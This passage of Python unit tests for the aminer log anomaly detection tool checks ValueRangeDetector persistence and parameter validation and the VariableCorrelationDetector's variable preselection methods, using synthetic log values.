        reloaded = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default",
                                      True, False)
        self.assertEqual(detector.ranges, reloaded.ranges)
        self.assertEqual(reloaded.ranges, expected_ranges)
        # The on-disk representation tags the key types explicitly.
        with open(detector.persistence_file_name, "r") as persisted:
            self.assertEqual(
                persisted.read(),
                """{"string:min": {"tuple:('a',)": 2.5, "tuple:('b',)": 3.1}, "string:max": {"tuple:('a',)": 4.75, "tuple:('b',)": 6.3}}""")
        # Explicit reload after clearing the in-memory state.
        detector.ranges = {"min": {}, "max": {}}
        detector.load_persistence_data()
        self.assertEqual(detector.ranges, expected_ranges)
        # A detector created with learn_mode=False sees the same persisted data.
        other = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default",
                                   False, False)
        self.assertEqual(detector.ranges, other.ranges)

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, ["default"], ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, None, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, "", ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, b"Default", ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, True, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 123, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 123.3, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, {"id": "Default"}, ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, (), ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, set(), ["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"]) ValueRangeDetector(self.aminer_config, 
[self.stream_printer_event_handler], None) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], target_path_list=["Default"]) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=None) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=b"Default") self.assertRaises(TypeError, 
ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], persistence_id="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=b"True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode="True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["Default"], learn_mode=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=None) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=b"True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline="True") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], 
output_logline=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], output_logline=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], ignore_list=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["Default"], constraint_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list="Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], constraint_list=["Default"]) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=100) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list="") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=True) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=123) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=()) 
self.assertRaises(TypeError, ValueRangeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=set()) ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/VariableCorrelationDetectorTest.py000066400000000000000000003446011500476301700324460ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD import time import random from copy import deepcopy class VariableCorrelationDetectorTest(TestBase): """This class containts unittests for the VariableCorrelationDetector.""" iterations = 20 dataset_size = 100 significance_niveau = 0.05 def test1filter_variables_with_vtd(self): """This test case checks if the variables are filtered accurately using the VariableTypeDetector.""" self.filter_variables(True) def test2filter_variables_without_vtd(self): """This test case checks if the variables are filtered accurately without using the VariableTypeDetector.""" self.filter_variables(False) def filter_variables(self, use_vtd): """Run the filter variables code with or without the VariableTypeDetector.""" t = time.time() stat_data = b"5.3.0-55-generic" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for _ in range(self.dataset_size): etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in static data. self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for i in range(self.dataset_size): stat_data = bytes(str((i % 60) * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in others data. 
self.assertEqual(vcd.pos_var_val, [[]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values)) # the vcd should learn any correlations in discrete data. self.assertEqual(vcd.pos_var_val, [[values_set]]) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) if use_vtd: vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.3, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 11) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(None, stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) if use_vtd: vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations if the discrete data is not in the threshold. 
        self.assertEqual(vcd.pos_var_val, [[]])

    def test3initialize_variables_with_matchDiscDistr_preselection_method(self):
        """Check the matchDiscDistr preselection method on probability lists that differ in length and in shape."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)

        def uniform(count):
            # Probability list of `count` equally likely values.
            return [1.0 / count] * count

        reference = uniform(10)
        # (candidate distribution, correlation expected)
        cases = (
            (uniform(14), True),                # more values than the reference still correlate
            (uniform(7), True),                 # fewer values than the reference still correlate
            (uniform(30), False),               # occurrence probabilities differ too much
            ([0.2] + [0.8 / 9] * 9, False),     # one value far more likely than in the reference
        )
        for candidate, expected in cases:
            check = self.assertTrue if expected else self.assertFalse
            check(vcd.pick_cor_match_disc_distr(reference, candidate))
        # The order of the reference list must not influence the result.
        reference = [0.3] * 2 + [0.4 / 3] * 3
        random.shuffle(reference)
        self.assertTrue(vcd.pick_cor_match_disc_distr(reference, uniform(5)))

    def test4initialize_variables_with_excludeDueDistr_preselection_method(self):
        """Check the excludeDueDistr preselection method: a single dominant value excludes the variable, spread-out ones do not."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
        # (probability list, variable is kept)
        cases = (
            ([0.1] * 10, True),                 # equal distribution
            ([0.3] + [0.078] * 9, True),        # almost equal distribution
            ([0.5] + [0.056] * 9, False),       # one value with high probability
            ([0.3] * 3 + [0.014] * 7, True),    # several values with high probability
            # boundaries for two, three and four distinct values
            ([0.5] * 2, True),
            ([0.8, 0.2], False),
            ([0.33] * 3, True),
            ([0.7] + [0.15] * 2, False),
            ([0.25] * 4, True),
            ([0.58] + [0.14] * 3, False),
        )
        for distribution, kept in cases:
            check = self.assertTrue if kept else self.assertFalse
            check(vcd.pick_cor_exclude_due_distr(distribution))

    def test5initialize_variables_with_matchDiscVals_preselection_method(self):
        """
        Check the matchDiscVals preselection method.

        Unlike test3 this works on the discrete values themselves rather than on probabilities, but the value sets are built in
        the same spirit.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)

        def via_text(step, count):
            # Values that made a text round trip, like parsed log data: float(bytes(str(i * step), "utf-8")).
            return [float(str(i * step).encode("utf-8")) for i in range(count)]

        reference = [i * 0.1 for i in range(10)]
        # A smaller second set correlates as long as it overlaps enough.
        self.assertTrue(vcd.pick_cor_match_disc_vals(reference, [i * 0.2 for i in range(7)]))
        # Too many differing values - no correlation.
        self.assertFalse(vcd.pick_cor_match_disc_vals(reference, [i * 0.3 for i in range(7)]))

        reference = via_text(0.1, 58)
        # 41 values in steps of 0.2 against 58 values in steps of 0.1 is still within the tolerated difference ...
        self.assertTrue(vcd.pick_cor_match_disc_vals(reference, via_text(0.2, 41)))
        # ... one value more is not.
        self.assertFalse(vcd.pick_cor_match_disc_vals(reference, via_text(0.2, 42)))

    def test6initialize_variables_with_random_preselection_method(self):
        """
        Check the random preselection method.

        percentage_random_cors is swept over [0.01..1.0[. With five paths there are ten possible pairs, and the number of picked
        pairs is the rounded share of ten, e.g. exactly one pair for 0.05 <= percentage_random_cors < 0.15. A pair must not
        combine a path with itself and must not occur a second time in reversed order. Every path carries the same discrete
        data.
        """
        t = time.time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1,
                                          used_presel_meth=["random"])
        for i in range(self.dataset_size):
            stat_data = str((i % 10) * 0.1).encode("utf-8")
            children = [MatchElement(str(j), stat_data, stat_data, None) for j in range(5)]
            root = MatchElement("/", str(i).encode(), str(i).encode(), children)
            etd.receive_atom(LogAtom(stat_data, ParserMatch(root), t, self.__class__.__name__))
        vcd.init_cor(0)

        for percent in range(1, 100):
            vcd.percentage_random_cors = percent / 100
            # rounded share of the ten possible pairs; .5 rounds up.
            expected = percent // 10 + (1 if percent % 10 >= 5 else 0)
            correlations = vcd.pick_cor_random(0)
            self.assertEqual(len(correlations), expected, "Error at i = %d" % percent)
            for pair in correlations:
                # no path correlates with itself ...
                self.assertNotEqual(pair[0], pair[1])
                # ... and the reversed pair is not picked a second time.
                self.assertNotIn([pair[1], pair[0]], correlations)

        # percentage_random_cors outside ]0, 1[ is rejected on construction.
        for bad_share in (1.2, 1.0, 0.0, -1.2):
            self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd,
                              disc_div_thres=0.1, used_presel_meth=["random"], percentage_random_cors=bad_share)

    def test7initialize_variables_with_intersect_presel_meth(self):
        """
        Check the intersect_presel_meth flag when "excludeDueDistr" and "matchDiscVals" are combined.

        With intersect_presel_meth=False a pair only has to be selected by one of the methods (union); with
        intersect_presel_meth=True it has to be selected by both (intersection). The counts are compared against detectors that
        run each method alone.
        """
        t = time.time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd_union = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1,
                                                used_presel_meth=["excludeDueDistr", "matchDiscVals"], intersect_presel_meth=False)
        vcd_intersection = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                                       used_presel_meth=["excludeDueDistr", "matchDiscVals"], intersect_presel_meth=True)
        vcd_exclude = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1,
                                                  used_presel_meth=["excludeDueDistr"])
        vcd_match = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1,
                                                used_presel_meth=["matchDiscVals"])
        # Four variables: "/" is balanced, "2" is dominated by one value, "3" and "4" use a different alphabet.
        var1 = ["a"] * 50 + ["b"] * 50
        var2 = ["a"] * 90 + ["b"] * 10
        var3 = ["c"] * 20 + ["d"] * 50 + ["e"] * 30
        var4 = ["c"] * 50 + ["d"] * 50
        for head, second, third, fourth in zip(var1, var2, var3, var4):
            children = [MatchElement(path, value.encode(), value.encode(), None)
                        for path, value in (("2", second), ("3", third), ("4", fourth))]
            root = MatchElement("/", head.encode(), head.encode(), children)
            etd.receive_atom(LogAtom(head.encode(), ParserMatch(root), t, self.__class__.__name__))
        for detector in (vcd_union, vcd_intersection, vcd_exclude, vcd_match):
            detector.init_cor(0)

        values_set = [[list(set(var1)), list(set(var2)), list(set(var3)), list(set(var4))]]
        # NOTE(review): assertTrue takes its second argument as the failure message, so the two assertTrue calls below only
        # check that sorted(pos_var_val) is non-empty - the value sets are never compared. A real comparison would also have
        # to normalise the order inside each inner list first, since set iteration order is not stable across runs.
        self.assertTrue(sorted(vcd_union.pos_var_val), sorted(values_set))
        # intersect_presel_meth=False: a pair is kept if at least one method selects it (OR).
        union = deepcopy(vcd_exclude.pos_var_cor[0])
        for pair in vcd_match.pos_var_cor[0]:
            if pair not in union:
                union.append(pair)
        self.assertEqual(len(union), len(vcd_union.pos_var_cor[0]))

        self.assertTrue(sorted(vcd_intersection.pos_var_val), sorted(values_set))
        # intersect_presel_meth=True: a pair is kept only if both methods select it (AND).
        intersection = []
        for pair in vcd_exclude.pos_var_cor[0]:
            if pair in vcd_match.pos_var_cor[0] and pair not in intersection:
                intersection.append(pair)
        for pair in vcd_match.pos_var_cor[0]:
            if pair in vcd_exclude.pos_var_cor[0] and pair not in intersection:
                intersection.append(pair)
        self.assertEqual(len(intersection), len(vcd_intersection.pos_var_cor[0]))

    def test8initialize_variables_with_no_preselection_method(self):
        """
        This test case checks the selection with no preselection method used.

        Also this test case checks the functionality of the Rel and WRel methods. For the data generation the main path "/"
        always contains (i % 10)*1 and child elements contain (i % 10)*1 for half of the time and (i % 10)*2 for the other half.
        The first half of the data contains 10 different values. These values are not combined with other values like in the
        second half of the data, which introduces 5 new values. Therefore 15 combinations exist (5+4+3+2+1=15). 10 correlations
        exist when "/" = i*1 -> child = i*1. In the second half 5 new correlations are added when "/" = i*1 -> child = i*2.
        """
        t = time.time()
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5,
                                          num_init=self.dataset_size)
        values1 = []
        # generate the first half of the data with child elements being (i % 10) * 0.1.
for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 1), "utf-8") values1.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) values2 = [] # generate the second half of the data with child elements being (i % 10) * 2. for i in range(self.dataset_size // 2): stat_data = bytes(str((i % 10) * 2), "utf-8") values2.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) values_set = list(set(values1 + values2)) pos_var_val = deepcopy(vcd.pos_var_val) # all child elements should contain data from values1 and values2. index = pos_var_val[0].index(values_set) del pos_var_val[0][index] # no other element should contain the united set of values1 and values2. self.assertRaises(ValueError, pos_var_val[0].index, values_set) # only values1 should be found, because the main path contains only data generated with (i % 10) * 1. self.assertEqual(pos_var_val, [[list(set(values1))]]) # test the functionality of the Rel and WRel methods # copy both lists to not modify the actual lists of the vcd. rel_list = deepcopy(vcd.rel_list) w_rel_list = deepcopy(vcd.w_rel_list) for rel in rel_list[0]: for r in rel: step = 2 for i in range(len(r)): key = (i % 20 >= 10)*10 + ((i % 10) * step) # search for the key k in the relation r or convert key to float if applicable. for k in r: if key == 0.0: break if k != 0.0 and k % key == 0: key = k break value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. 
